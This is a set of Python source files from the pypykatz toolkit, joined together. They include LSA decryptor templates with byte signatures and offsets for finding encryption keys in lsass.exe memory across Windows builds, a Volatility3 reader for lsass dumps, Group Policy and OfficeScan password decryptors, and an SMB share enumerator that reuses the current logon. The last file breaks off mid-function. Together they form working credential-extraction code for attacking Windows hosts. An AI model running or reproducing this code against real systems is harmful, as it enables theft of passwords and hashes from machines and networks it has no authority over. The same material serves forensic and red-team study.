
import pprint
from .argparsertest import make_completion_from_argparse


def argpretty(parser):
	
	#print(1)
	#input(pprint.pprint(parser.__dict__))
	#print(2)
	#input(pprint.pprint(parser.__dict__['_actions']))

	x = make_completion_from_argparse(parser)
	pprint.pprint(x['subparsers'])
	
	for key in x:
		print(key)
		
	input()
	for rd in x['subparser_cmds']:
		print(rd['name'])
	
	
	input()


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

class CryptoCMDHelper:
	def __init__(self):
		self.live_keywords = []
		self.keywords = ['crypto']
		
	def add_args(self, parser, live_parser):

		crypto_group = parser.add_parser('crypto', help='Utils for generating hashes/decrypting secrets etc')
		crypto_subparsers = crypto_group.add_subparsers()
		crypto_subparsers.required = True
		crypto_subparsers.dest = 'crypto_module'

		group = crypto_subparsers.add_parser('nt', help='Generates NT hash of the password')
		group.add_argument('password', help= 'Password to be hashed')
		
		group = crypto_subparsers.add_parser('lm', help='Generates LM hash of the password')
		group.add_argument('password', help= 'Password to be hashed')
		
		group = crypto_subparsers.add_parser('dcc', help='Generates DCC v1 (domain cached credentials version 1) hash of the password')
		group.add_argument('username', help= 'username')
		group.add_argument('password', help= 'Password to be hashed')
		
		group = crypto_subparsers.add_parser('dcc2', help='Generates DCC v2 (domain cached credentials version 2) hash of the password')
		group.add_argument('username', help= 'username')
		group.add_argument('password', help= 'Password to be hashed')
		group.add_argument('-i','--iteration-count', type = int, default=10240, help= 'iteration-count')
		
		group = crypto_subparsers.add_parser('gppass', help='Decrypt GP passwords')
		group.add_argument('enc', help='Encrypted password string')

		group = crypto_subparsers.add_parser('ofscan', help='Decrypt TrendMicro OfficeScan config file')
		group.add_argument('enc', help='Encrypted password string or path to ofcscan.ini file')
		
		
	def execute(self, args):
		if args.command in self.keywords:
			self.run(args)
		if len(self.live_keywords) > 0 and args.command == 'live' and args.module in self.live_keywords:
			raise Exception('There are no live commands for crypto.')
			#self.run_live(args)
			
	def run(self, args):
		from pypykatz.utils.crypto.winhash import NT, LM, MSDCC, MSDCCv2
		from pypykatz.utils.crypto.gppassword import gppassword
		from pypykatz.utils.crypto.ofcdecrypt import ofscan_decrypt_data

		if args.crypto_module == 'nt':
			print(NT(args.password).hex())
		
		elif args.crypto_module == 'lm':
			print(LM(args.password).hex())
			
		elif args.crypto_module == 'dcc':
			print(MSDCC(args.username, args.password).hex())
			
		elif args.crypto_module == 'dcc2':
			print(MSDCCv2(args.username, args.password, args.iteration_count).hex())
			
		elif args.crypto_module == 'gppass':
			print(gppassword(args.enc))
		
		elif args.crypto_module == 'ofscan':
			for param, res in ofscan_decrypt_data(args.enc):
				print('%s: %s' % (param, res))


from msldap.commons.factory import LDAPConnectionFactory
from aiosmb.examples.smbshareenum import SMBFileEnum, ListTargetGen, FileTargetGen

def get_smb_url(authmethod = 'ntlm', protocol_version = '2', host = None):
	from winacl.functions.highlevel import get_logon_info
	info = get_logon_info()
	logonserver = info['logonserver']
	if host is not None:
		logonserver = host

	return 'smb%s+sspi-%s://%s\\%s@%s' % (protocol_version, authmethod, info['domain'], info['username'], logonserver)


def get_ldap_url(authmethod = 'ntlm', host = None):
	from winacl.functions.highlevel import get_logon_info
	info = get_logon_info()

	logonserver = info['logonserver']
	if host is not None:
		logonserver = host

	return 'ldap+sspi-%s://%s\\%s@%s' % (authmethod, info['domain'], info['username'], logonserver)

class LDAPTargetGen:
	def __init__(self, url):
		self.url = url
	
	async def generate(self):
		try:
			conn_url = LDAPConnectionFactory.from_url(self.url)
			connection = conn_url.get_client()
			_, err = await connection.connect()
			if err is not None:
				raise err
			
			adinfo = connection._ldapinfo
			domain_name = adinfo.distinguishedName.replace('DC','').replace('=','').replace(',','.')

			async for machine, err in connection.get_all_machines(attrs=['sAMAccountName', 'dNSHostName', 'objectSid']):
				if err is not None:
					raise err
					
				dns = machine.dNSHostName
				if dns is None:
					dns = '%s.%s' % (machine.sAMAccountName[:-1], domain_name)
				
				yield str(machine.objectSid), str(dns), None

		except Exception as e:
			yield None, None, e
	

async def shareenum(smb_url, ldap_url = None, targets = None, smb_worker_count = 10, depth = 3, out_file = None, progress = False, max_items = None, dirsd = False, filesd = False, authmethod = 'ntlm', protocol_version = '2', output_type = 'str', max_runtime = None, exclude_share = ['print$'], exclude_dir = [], exclude_target = []):

	if smb_url == 'auto':
		smb_url = get_smb_url(authmethod=authmethod, protocol_version=protocol_version)
	
	enumerator = SMBFileEnum(
		smb_url,
		worker_count = smb_worker_count, 
		depth = depth, 
		out_file = out_file, 
		show_pbar = progress,
		max_items = max_items,
		fetch_dir_sd = dirsd,
		fetch_file_sd = filesd,
		output_type = output_type,
		max_runtime = max_runtime,
		exclude_share = exclude_share,
		exclude_dir = exclude_dir,
		exclude_target = exclude_target
	)
	
	notfile = []
	if targets is not None:
		for target in targets:
			try:
				f = open(target, 'r')
				f.close()
				enumerator.target_gens.append(FileTargetGen(target))
			except:
				notfile.append(target)
		
		if len(notfile) > 0:
			enumerator.target_gens.append(ListTargetGen(notfile))
	
	if ldap_url is not None:
		if ldap_url == 'auto':
			ldap_url = get_ldap_url(authmethod=authmethod)
		enumerator.target_gens.append(LDAPTargetGen(ldap_url))

	if len(enumerator.target_gens) == 0:
		enumerator.enum_url = True
		#raise Exception('No suitable targets found!')

	await enumerator.run()



#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#


from pypykatz.alsadecryptor.win_datatypes import ULONG, PVOID, POINTER
from pypykatz.commons.common import KatzSystemArchitecture, WindowsMinBuild, WindowsBuild
from pypykatz.alsadecryptor.package_commons import PackageTemplate

class LsaTemplate_NT6(PackageTemplate):
	def __init__(self):
		super().__init__('LSA Decryptor')
		self.key_pattern = None
		self.key_handle_struct = None
		self.key_struct = None
		self.hard_key_struct = KIWI_HARD_KEY
		self.nt_major = '6'


	@staticmethod
	def get_template_brute(sysinfo):
		if sysinfo.architecture == KatzSystemArchitecture.X86:
			if sysinfo.buildnumber <= WindowsMinBuild.WIN_XP.value:
				raise Exception('NT 5 is not yet supported!')
			elif sysinfo.buildnumber <= WindowsMinBuild.WIN_2K3.value:
				raise Exception('NT 5 is not yet supported!')
			else:
				for key in templates['nt6']['x86']:
					yield templates['nt6']['x86'][key]

		elif sysinfo.architecture == KatzSystemArchitecture.X64:
			if sysinfo.buildnumber <= WindowsMinBuild.WIN_XP.value:
				raise Exception('NT 5 is not yet supported!')
			elif sysinfo.buildnumber <= WindowsMinBuild.WIN_2K3.value:
				raise Exception('NT 5 is not yet supported!')
			else:
				for key in templates['nt6']['x64']:
					yield templates['nt6']['x64'][key]
		
		
	@staticmethod
	def get_template(sysinfo):
		template = LsaTemplate_NT6()
		
		if sysinfo.architecture == KatzSystemArchitecture.X86:
			if sysinfo.buildnumber <= WindowsMinBuild.WIN_XP.value:
				raise Exception("Maybe implemented later")
			
			elif sysinfo.buildnumber <= WindowsMinBuild.WIN_2K3.value:
				template.nt_major = '5'
				template = templates['nt5']['x86']['1']
				
			elif WindowsMinBuild.WIN_VISTA.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_7.value:
				template = templates['nt6']['x86']['1']
				
			elif WindowsMinBuild.WIN_7.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_8.value:
				template = templates['nt6']['x86']['2']
				
			elif WindowsMinBuild.WIN_8.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_BLUE.value:
				template = templates['nt6']['x86']['3']
				
			elif WindowsMinBuild.WIN_BLUE.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_10.value:
				template = templates['nt6']['x86']['4']
				
			elif WindowsMinBuild.WIN_10.value <= sysinfo.buildnumber <= WindowsBuild.WIN_10_1507.value:
				template = templates['nt6']['x86']['5']
			
			elif WindowsBuild.WIN_10_1507.value > sysinfo.buildnumber < WindowsBuild.WIN_10_1909.value:
				#6
				template = templates['nt6']['x86']['6']
			else:
				#7
				template = templates['nt6']['x86']['7']
		
		elif sysinfo.architecture == KatzSystemArchitecture.X64:
		
			if sysinfo.buildnumber <= WindowsMinBuild.WIN_XP.value:
				raise Exception("Maybe implemented later")
			
			elif sysinfo.buildnumber <= WindowsMinBuild.WIN_2K3.value:
				raise Exception("Maybe implemented later")
			
			elif sysinfo.buildnumber < WindowsMinBuild.WIN_7.value:
				template = templates['nt6']['x64']['1']
		
			elif sysinfo.buildnumber < WindowsMinBuild.WIN_8.value:
				template = templates['nt6']['x64']['2']
			
			elif sysinfo.buildnumber < WindowsMinBuild.WIN_10.value:				
				if sysinfo.buildnumber < WindowsMinBuild.WIN_BLUE.value:
					if sysinfo.msv_dll_timestamp < 0x60000000:
						template = templates['nt6']['x64']['3']
					else:
						template = templates['nt6']['x64']['7']
				else:
					template = templates['nt6']['x64']['4']
			
			elif sysinfo.buildnumber < WindowsBuild.WIN_10_1809.value:
				template = templates['nt6']['x64']['5']
				
			elif WindowsBuild.WIN_10_1809.value >= sysinfo.buildnumber < WindowsMinBuild.WIN_11.value:
				template = templates['nt6']['x64']['6']
			else:
				template = templates['nt6']['x64']['8']
			
		else:
			raise Exception('Missing LSA decrpytor template for Architecture: %s , Build number %s' % (sysinfo.architecture, sysinfo.buildnumber))
		

		template.log_template('key_handle_struct', template.key_handle_struct)
		template.log_template('key_struct', template.key_struct)
		template.log_template('hard_key_struct', template.hard_key_struct)
		
		return template
		
		
class LSADecyptorKeyPattern:
	def __init__(self):
		self.signature = None #byte pattern that identifies the location of the key structures (AES and DES)
		self.offset_to_IV_ptr = None #offset from pattern that gives the pointer to the IV (applicabe for both keys, kept sepparately from key structures)
		self.IV_length = None #length of the IV, always 16 from NT6
		self.offset_to_AES_key_ptr = None #offset from signature that gives the pointer to the DES key structure
		self.offset_to_DES_key_ptr = None #offset from signature that gives the pointer to the AES key structure
		
class KIWI_HARD_KEY:
	def __init__(self):
		self.cbSecret = None
		self.data = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_BCRYPT_KEY()
		res.cbSecret = await ULONG.loadvalue(reader)
		res.data = await reader.read(res.cbSecret)
		return res
		
class KIWI_BCRYPT_KEY:
	def __init__(self):
		self.size = None
		self.tag  = None
		self.type = None
		self.unk0 = None
		self.unk1 = None
		self.unk2 = None
		self.hardkey = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_BCRYPT_KEY()
		res.size = await ULONG.loadvalue(reader)
		res.tag  = await reader.read(4)
		res.type = await ULONG.loadvalue(reader)
		res.unk0 = await ULONG.loadvalue(reader)
		res.unk1 = await ULONG.loadvalue(reader)
		res.unk2 = await ULONG.loadvalue(reader)
		res.hardkey = await KIWI_HARD_KEY.load(reader)
		return res
		
	def verify(self):
		return self.tag == b'KSSM'

class KIWI_BCRYPT_KEY8:
	def __init__(self):
		self.size = None
		self.tag  = None
		self.type = None
		self.unk0 = None
		self.unk1 = None
		self.unk2 = None
		self.unk3 = None
		#await reader.align()
		self.unk4 = None
		self.hardkey = None

	@staticmethod
	async def load(reader):
		res = KIWI_BCRYPT_KEY8()
		res.size = await ULONG.loadvalue(reader)
		res.tag  = await reader.read(4)	# 'MSSK'
		res.type = await ULONG.loadvalue(reader)
		res.unk0 = await ULONG.loadvalue(reader)
		res.unk1 = await ULONG.loadvalue(reader)
		res.unk2 = await ULONG.loadvalue(reader)
		res.unk3 = await ULONG.loadvalue(reader)
		await reader.align()
		res.unk4 = await PVOID.load(reader)	# before, align in x64
		res.hardkey = await KIWI_HARD_KEY.load(reader)
		return res
		
	def verify(self):
		return self.tag == b'KSSM' 

class KIWI_BCRYPT_KEY81:
	def __init__(self):
		self.size = None
		self.tag  = None
		self.type = None 
		self.unk0 = None 
		self.unk1 = None 
		self.unk2 = None  
		self.unk3 = None 
		self.unk4 = None 
		#await reader.align()
		self.unk5 = None	#before, align in x64
		self.unk6 = None
		self.unk7 = None
		self.unk8 = None
		self.unk9 = None
		self.hardkey = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_BCRYPT_KEY81()
		res.size = await ULONG.loadvalue(reader)
		res.tag  = await reader.read(4)	# 'MSSK'
		res.type = await ULONG.loadvalue(reader)
		res.unk0 = await ULONG.loadvalue(reader)
		res.unk1 = await ULONG.loadvalue(reader)
		res.unk2 = await ULONG.loadvalue(reader) 
		res.unk3 = await ULONG.loadvalue(reader)
		res.unk4 = await ULONG.loadvalue(reader)
		await reader.align()
		res.unk5 = await PVOID.load(reader)	#before, align in x64
		res.unk6 = await ULONG.loadvalue(reader)
		res.unk7 = await ULONG.loadvalue(reader)
		res.unk8 = await ULONG.loadvalue(reader)
		res.unk9 = await ULONG.loadvalue(reader)
		res.hardkey = await KIWI_HARD_KEY.load(reader)
		return res
		
	def verify(self):
		return self.tag == b'KSSM'


class KIWI_BCRYPT_KEY81_NEW:
	def __init__(self):
		self.size = None
		self.tag  = None
		self.type = None 
		self.unk0 = None 
		self.unk1 = None 
		self.unk2 = None  
		self.unk3 = None 
		self.unk4 = None 
		self.unk5 = None	#before, align in x64
		self.unk6 = None
		self.unk7 = None
		self.unk8 = None
		self.unk9 = None
		self.unk10 = None
		self.hardkey = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_BCRYPT_KEY81_NEW()
		res.size = await ULONG.loadvalue(reader)
		res.tag  = await reader.read(4)	# 'MSSK'
		res.type = await ULONG.loadvalue(reader)
		res.unk0 = await ULONG.loadvalue(reader)
		res.unk1 = await ULONG.loadvalue(reader)
		res.unk2 = await ULONG.loadvalue(reader) 
		res.unk3 = await ULONG.loadvalue(reader)
		res.unk4 = await ULONG.loadvalue(reader)
		await reader.align()
		res.unk5 = await PVOID.load(reader)	#before, align in x64
		res.unk6 = await ULONG.loadvalue(reader)
		res.unk7 = await ULONG.loadvalue(reader)
		res.unk8 = await ULONG.loadvalue(reader)
		res.unk9 = await ULONG.loadvalue(reader)
		res.unk10 = await ULONG.loadvalue(reader)
		res.hardkey = await KIWI_HARD_KEY.load(reader)
		return res
		
	def verify(self):
		return self.tag == b'KSSM' 
		

class PKIWI_BCRYPT_KEY(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PVOID()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_BCRYPT_KEY
		return p

class KIWI_BCRYPT_HANDLE_KEY:
	def __init__(self):
		self.size = None
		self.tag = None
		self.hAlgorithm = None
		self.ptr_key = None
		self.unk0 = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_BCRYPT_HANDLE_KEY()
		res.size = await ULONG.loadvalue(reader)
		res.tag = await reader.read(4)	# 'UUUR'
		res.hAlgorithm = await PVOID.load(reader)
		res.ptr_key = await PKIWI_BCRYPT_KEY.load(reader)
		res.unk0 = await PVOID.load(reader)
		return res
		
	def verify(self):
		return self.tag == b'RUUU'

class LSA_x64_1(LsaTemplate_NT6):
	def __init__(self):
		LsaTemplate_NT6.__init__(self)
		self.key_pattern = LSADecyptorKeyPattern()
		self.key_pattern.signature = b'\x83\x64\x24\x30\x00\x44\x8b\x4c\x24\x48\x48\x8b\x0d'
		self.key_pattern.IV_length = 16
		self.key_pattern.offset_to_IV_ptr = 63
		self.key_pattern.offset_to_DES_key_ptr = -69
		self.key_pattern.offset_to_AES_key_ptr = 25
		
		self.key_struct = KIWI_BCRYPT_KEY
		self.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY

class LSA_x64_2(LsaTemplate_NT6):
	def __init__(self):
		LsaTemplate_NT6.__init__(self)
		self.key_pattern = LSADecyptorKeyPattern()
		self.key_pattern.signature = b'\x83\x64\x24\x30\x00\x44\x8b\x4c\x24\x48\x48\x8b\x0d'
		self.key_pattern.IV_length = 16
		self.key_pattern.offset_to_IV_ptr = 59
		self.key_pattern.offset_to_DES_key_ptr = -61
		self.key_pattern.offset_to_AES_key_ptr = 25
		
		self.key_struct = KIWI_BCRYPT_KEY
		self.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY

				
class LSA_x64_3(LsaTemplate_NT6):
	def __init__(self):
		LsaTemplate_NT6.__init__(self)
		self.key_pattern = LSADecyptorKeyPattern()
		self.key_pattern.signature = b'\x83\x64\x24\x30\x00\x44\x8b\x4d\xd8\x48\x8b\x0d'
		self.key_pattern.IV_length = 16
		self.key_pattern.offset_to_IV_ptr = 62
		self.key_pattern.offset_to_DES_key_ptr = -70
		self.key_pattern.offset_to_AES_key_ptr = 23
		
		self.key_struct = KIWI_BCRYPT_KEY8
		self.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY

class LSA_x64_4(LsaTemplate_NT6):
	def __init__(self):
		LsaTemplate_NT6.__init__(self)
		self.key_pattern = LSADecyptorKeyPattern()
		self.key_pattern.signature = b'\x83\x64\x24\x30\x00\x44\x8b\x4d\xd8\x48\x8b\x0d'
		self.key_pattern.IV_length = 16
		self.key_pattern.offset_to_IV_ptr = 62
		self.key_pattern.offset_to_DES_key_ptr = -70
		self.key_pattern.offset_to_AES_key_ptr = 23
		
		self.key_struct = KIWI_BCRYPT_KEY81
		self.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY				

class LSA_x64_5(LsaTemplate_NT6):
	def __init__(self):
		LsaTemplate_NT6.__init__(self)
		self.key_pattern = LSADecyptorKeyPattern()
		self.key_pattern.signature = b'\x83\x64\x24\x30\x00\x48\x8d\x45\xe0\x44\x8b\x4d\xd8\x48\x8d\x15'
		self.key_pattern.IV_length = 16
		self.key_pattern.offset_to_IV_ptr = 61
		self.key_pattern.offset_to_DES_key_ptr = -73
		self.key_pattern.offset_to_AES_key_ptr = 16
		
		self.key_struct = KIWI_BCRYPT_KEY81
		self.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY

class LSA_x64_6(LsaTemplate_NT6):
	def __init__(self):
		LsaTemplate_NT6.__init__(self)
		self.key_pattern = LSADecyptorKeyPattern()
		self.key_pattern.signature = b'\x83\x64\x24\x30\x00\x48\x8d\x45\xe0\x44\x8b\x4d\xd8\x48\x8d\x15'
		self.key_pattern.IV_length = 16
		self.key_pattern.offset_to_IV_ptr = 67
		self.key_pattern.offset_to_DES_key_ptr = -89
		self.key_pattern.offset_to_AES_key_ptr = 16
				
		self.key_struct = KIWI_BCRYPT_KEY81
		self.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY

class LSA_x64_7(LsaTemplate_NT6):
	def __init__(self):
		LsaTemplate_NT6.__init__(self)
		self.key_pattern = LSADecyptorKeyPattern()
		self.key_pattern.signature = b'\x83\x64\x24\x30\x00\x44\x8b\x4d\xd8\x48\x8b\x0d'
		self.key_pattern.IV_length = 16
		self.key_pattern.offset_to_IV_ptr = 58
		self.key_pattern.offset_to_DES_key_ptr = -62
		self.key_pattern.offset_to_AES_key_ptr = 23
		
		self.key_struct = KIWI_BCRYPT_KEY8
		self.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY

class LSA_x64_8(LsaTemplate_NT6):
	def __init__(self):
		LsaTemplate_NT6.__init__(self)
		self.key_pattern = LSADecyptorKeyPattern()
		self.key_pattern.signature = b'\x83\x64\x24\x30\x00\x48\x8d\x45\xe0\x44\x8b\x4d\xd8\x48\x8d\x15'
		self.key_pattern.IV_length = 16
		#self.key_pattern.offset_to_IV_ptr = 71
		self.key_pattern.offset_to_IV_ptr = 58
		self.key_pattern.offset_to_DES_key_ptr = -89
		self.key_pattern.offset_to_AES_key_ptr = 16
		
		self.key_struct = KIWI_BCRYPT_KEY81
		self.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY

class LSA_x86_1(LsaTemplate_NT6):
	def __init__(self):
		LsaTemplate_NT6.__init__(self)
		self.key_pattern = LSADecyptorKeyPattern()
		self.key_pattern.signature = b'\x6a\x02\x6a\x10\x68'
		self.key_pattern.IV_length = 16
		self.key_pattern.offset_to_IV_ptr = 5
		self.key_pattern.offset_to_DES_key_ptr = -76
		self.key_pattern.offset_to_AES_key_ptr = -21

		self.key_struct = KIWI_BCRYPT_KEY
		self.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY

class LSA_x86_2(LsaTemplate_NT6):
	def __init__(self):
		LsaTemplate_NT6.__init__(self)
		self.key_pattern = LSADecyptorKeyPattern()
		self.key_pattern.signature = b'\x6a\x02\x6a\x10\x68'
		self.key_pattern.IV_length = 16
		self.key_pattern.offset_to_IV_ptr = 5
		self.key_pattern.offset_to_DES_key_ptr = -76
		self.key_pattern.offset_to_AES_key_ptr = -21
		
		self.key_struct = KIWI_BCRYPT_KEY
		self.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY

class LSA_x86_3(LsaTemplate_NT6):
	def __init__(self):
		LsaTemplate_NT6.__init__(self)
		self.key_pattern = LSADecyptorKeyPattern()
		self.key_pattern.signature = b'\x6a\x02\x6a\x10\x68'
		self.key_pattern.IV_length = 16
		self.key_pattern.offset_to_IV_ptr = 5
		self.key_pattern.offset_to_DES_key_ptr = -69
		self.key_pattern.offset_to_AES_key_ptr = -18
		
		self.key_struct = KIWI_BCRYPT_KEY8
		self.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY

class LSA_x86_4(LsaTemplate_NT6):
	def __init__(self):
		LsaTemplate_NT6.__init__(self)
		self.key_pattern = LSADecyptorKeyPattern()
		self.key_pattern.signature = b'\x6a\x02\x6a\x10\x68'
		self.key_pattern.IV_length = 16
		self.key_pattern.offset_to_IV_ptr = 5
		self.key_pattern.offset_to_DES_key_ptr = -69
		self.key_pattern.offset_to_AES_key_ptr = -18
		
		self.key_struct = KIWI_BCRYPT_KEY81
		self.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY

class LSA_x86_5(LsaTemplate_NT6):
	def __init__(self):
		LsaTemplate_NT6.__init__(self)
		self.key_pattern = LSADecyptorKeyPattern()
		self.key_pattern.signature = b'\x6a\x02\x6a\x10\x68'
		self.key_pattern.IV_length = 16
		self.key_pattern.offset_to_IV_ptr = 5
		self.key_pattern.offset_to_DES_key_ptr = -79
		self.key_pattern.offset_to_AES_key_ptr = -22
				
		self.key_struct = KIWI_BCRYPT_KEY81
		self.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY

class LSA_x86_6(LsaTemplate_NT6):
	def __init__(self):
		LsaTemplate_NT6.__init__(self)

		self.key_pattern = LSADecyptorKeyPattern()
		self.key_pattern.signature = b'\x6a\x02\x6a\x10\x68'
		self.key_pattern.IV_length = 16
		self.key_pattern.offset_to_IV_ptr = 5
		self.key_pattern.offset_to_DES_key_ptr = -79
		self.key_pattern.offset_to_AES_key_ptr = -22

		self.key_struct = KIWI_BCRYPT_KEY81
		self.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY

class LSA_x86_7(LsaTemplate_NT6):
	def __init__(self):
		LsaTemplate_NT6.__init__(self)

		self.key_pattern = LSADecyptorKeyPattern()
		self.key_pattern.signature = b'\x6a\x02\x6a\x10\x68'
		self.key_pattern.IV_length = 16
		self.key_pattern.offset_to_IV_ptr = 5
		self.key_pattern.offset_to_DES_key_ptr = -79
		self.key_pattern.offset_to_AES_key_ptr = -22

		self.key_struct = KIWI_BCRYPT_KEY81_NEW
		self.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY

templates = {
	'nt6' : {
		'x64' : {
			'1' : LSA_x64_1(),
			'2' : LSA_x64_2(),
			'3' : LSA_x64_3(),
			'4' : LSA_x64_4(),
			'5' : LSA_x64_5(),
			'6' : LSA_x64_6(),
			'7' : LSA_x64_7(),
			'8' : LSA_x64_8(),
		},
		'x86': {
			'1' : LSA_x86_1(),
			'2' : LSA_x86_2(),
			'3' : LSA_x86_3(),
			'4' : LSA_x86_4(),
			'5' : LSA_x86_5(),
			'6' : LSA_x86_6(),
			'7' : LSA_x86_7(),
		}
	}
}


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#
#
# This file contains a reader implementation to interface pypykatz lsass parsing module with volatility3
# One would need to install volatility3 and drop the plugin file (separate project) to the appropriate volatility3 plugins folder
# The reason why the reader code is not in the plugin folder is that in case pypykatz plugin becomes official in vol3, I don't wish to administer changes via PR to the vol3 team
# they probably have more important things to deal with :)
#

from pypykatz.commons.common import *

from . import *


class VOL3Section:
	def __init__(self):
		self.start = None
		self.end = None
		self.size = None

	@staticmethod
	def from_vad(vad):
		s = VOL3Section()
		s.start = int(vad.get_start())
		s.end = int(vad.get_end())
		s.size = s.end - s.start
		return s

class VOL3Module:
	def __init__(self):
		self.name = None
		self.start_addr = None
		self.end_addr = None
		self.size = None

	@staticmethod
	def from_module(BaseDllName, FullDllName, entry):
		rm = VOL3Module()
		rm.name = str(BaseDllName).lower()
		rm.start_addr = int(entry.DllBase)
		rm.size = int(entry.SizeOfImage)
		rm.end_addr = rm.start_addr + rm.size
		return rm

class VOL3Sysinfo:
	def __init__(self):
		self.architecture = None
		self.buildnumber = None
		self.msv_dll_timestamp = 0x53480000 + 1
		self.operating_system = None
		self.major_version = 6

class Vol3Reader:
	def __init__(self, vol_obj):
		self.vol_obj = vol_obj
		self.proc_layer_name = None
		self.proc_layer = None
		self.lsass_process = None
		self.modules = {}
		self.sections = []
		self.processor_architecture = None

		self.setup()

	def setup(self):
		self.find_lsass()
		self.list_dlls()
		self.get_buildnumber()
		self.list_sections()
		self.get_arch()

	def get_sysinfo(self):
		sysinfo = KatzSystemInfo()
		sysinfo.architecture = self.processor_architecture
		sysinfo.buildnumber = self.buildnumber
		sysinfo.msv_dll_timestamp = 0x53480000 + 1
		sysinfo.operating_system = None
		sysinfo.major_version = 6 #TODO: add majorversion check option
		return sysinfo

	def find_lsass(self):
		filter_func = pslist.PsList.create_name_filter(['lsass.exe'])
		for proc in pslist.PsList.list_processes(
					context = self.vol_obj.context,
					layer_name = self.vol_obj.config['primary'],
					symbol_table = self.vol_obj.config['nt_symbols'],
					filter_func = filter_func
				):
			self.lsass_process = proc
			self.proc_layer_name = self.lsass_process.add_process_layer()
			self.proc_layer = self.vol_obj.context.layers[self.proc_layer_name]
			return

		raise Exception('LSASS process not found!')

	def list_dlls(self):
		#https://github.com/volatilityfoundation/volatility3/blob/master/volatility/framework/plugins/windows/dlllist.py
		for entry in self.lsass_process.load_order_modules():
			BaseDllName = FullDllName = renderers.UnreadableValue()
			try:
				BaseDllName = entry.BaseDllName.get_string()
				# We assume that if the BaseDllName points to an invalid buffer, so will FullDllName
				FullDllName = entry.FullDllName.get_string()
			except exceptions.InvalidAddressException:
				pass
			
			module = VOL3Module.from_module(BaseDllName, FullDllName, entry)
			self.modules[module.name] = module

	def get_buildnumber(self):
		# https://github.com/volatilityfoundation/volatility3/blob/ee31ece0062ce762ed38f6d0a1c54e9f1cd37970/volatility/framework/plugins/windows/cmdline.py
		peb = self.vol_obj.context.object(
		    self.vol_obj.config["nt_symbols"] + constants.BANG + "_PEB",
		    layer_name = self.proc_layer_name,
		    offset = self.lsass_process.Peb
		)
		self.buildnumber = peb.OSBuildNumber

	def list_sections(self):
		# not entirely sure if this is needed...
		#https://github.com/volatilityfoundation/volatility3/blob/9af7fbb48ddaa2fb9c74754b8a95e77c66533bf1/volatility/framework/plugins/windows/vadinfo.py#L82
		for vad in self.lsass_process.get_vad_root().traverse():
			self.sections.append(VOL3Section.from_vad(vad))

	def get_arch(self):
		if not symbols.symbol_table_is_64bit(self.vol_obj.context, self.vol_obj.config["nt_symbols"]):
			self.processor_architecture = KatzSystemArchitecture.X86
		self.processor_architecture = KatzSystemArchitecture.X64

	def align(self, alignment = None):
		"""
		Repositions the current reader to match architecture alignment
		"""
		if alignment is None:
			if self.processor_architecture == KatzSystemArchitecture.X64:
				alignment = 8
			else:
				alignment = 4
		offset = self.cur_pos % alignment
		if offset == 0:
			return
		offset_to_aligned = (alignment - offset) % alignment
		self.read(offset_to_aligned)
		return

	def tell(self):
		"""
		Returns the current virtual address
		"""
		return self.cur_pos

	def read_int(self):
		"""
		Reads an integer. The size depends on the architecture. 
		Reads a 4 byte small-endian singed int on 32 bit arch
		Reads an 8 byte small-endian singed int on 64 bit arch
		"""
		if self.processor_architecture == KatzSystemArchitecture.X64:
			return int.from_bytes(self.read(8), byteorder = 'little', signed = True)
		else:
			return int.from_bytes(self.read(4), byteorder = 'little', signed = True)
	
	def read_uint(self):
		"""
		Reads an integer. The size depends on the architecture. 
		Reads a 4 byte small-endian unsinged int on 32 bit arch
		Reads an 8 byte small-endian unsinged int on 64 bit arch
		"""
		if self.processor_architecture == KatzSystemArchitecture.X64:
			return int.from_bytes(self.read(8), byteorder = 'little', signed = False)
		else:
			return int.from_bytes(self.read(4), byteorder = 'little', signed = False)

	def get_ptr(self, pos):
		self.move(pos)
		return self.read_uint()

	def get_ptr_with_offset(self, pos):
		if self.processor_architecture == KatzSystemArchitecture.X64:
			self.move(pos)
			ptr = int.from_bytes(self.read(4), byteorder = 'little', signed = True)
			return pos + 4 + ptr
		else:
			self.move(pos)
			return self.read_uint()

	def move(self, pos):
		self.cur_pos = pos

	def read(self, size):
		data = self.proc_layer.read(self.cur_pos, size, pad = False)
		self.cur_pos += size
		return data

	def peek(self, size):
		return self.proc_layer.read(self.cur_pos, size)

	def find_in_module(self, module_name, pattern, find_first = False, reverse_order = False):
		if module_name.lower() not in self.modules:
			raise Exception('Module is not in lsass memory space! %s' % module_name)
		module = self.modules[module_name.lower()]
		res = []
		scanner = MultiStringScanner(patterns=[pattern])
		sections = [(int(module.start_addr), int(module.size))]
		for hit, _ in self.proc_layer.scan(
			context = self.vol_obj.context, 
			scanner = scanner,
			sections = sections
			): 
			res.append(int(hit))
		return res


def vol3_generator(mimi):
	for luid in mimi.logon_sessions:
		for row in mimi.logon_sessions[luid].to_grep_rows():
			yield 0, row
	for cred in mimi.orphaned_creds:
		t = cred.to_dict()
		if t['credtype'] != 'dpapi':
			if t['password'] is not None:
				x =  [str(t['credtype']), str(t['domainname']), str(t['username']), '', '', '', '', '', str(t['password']), '']
				yield 0, x
		else:
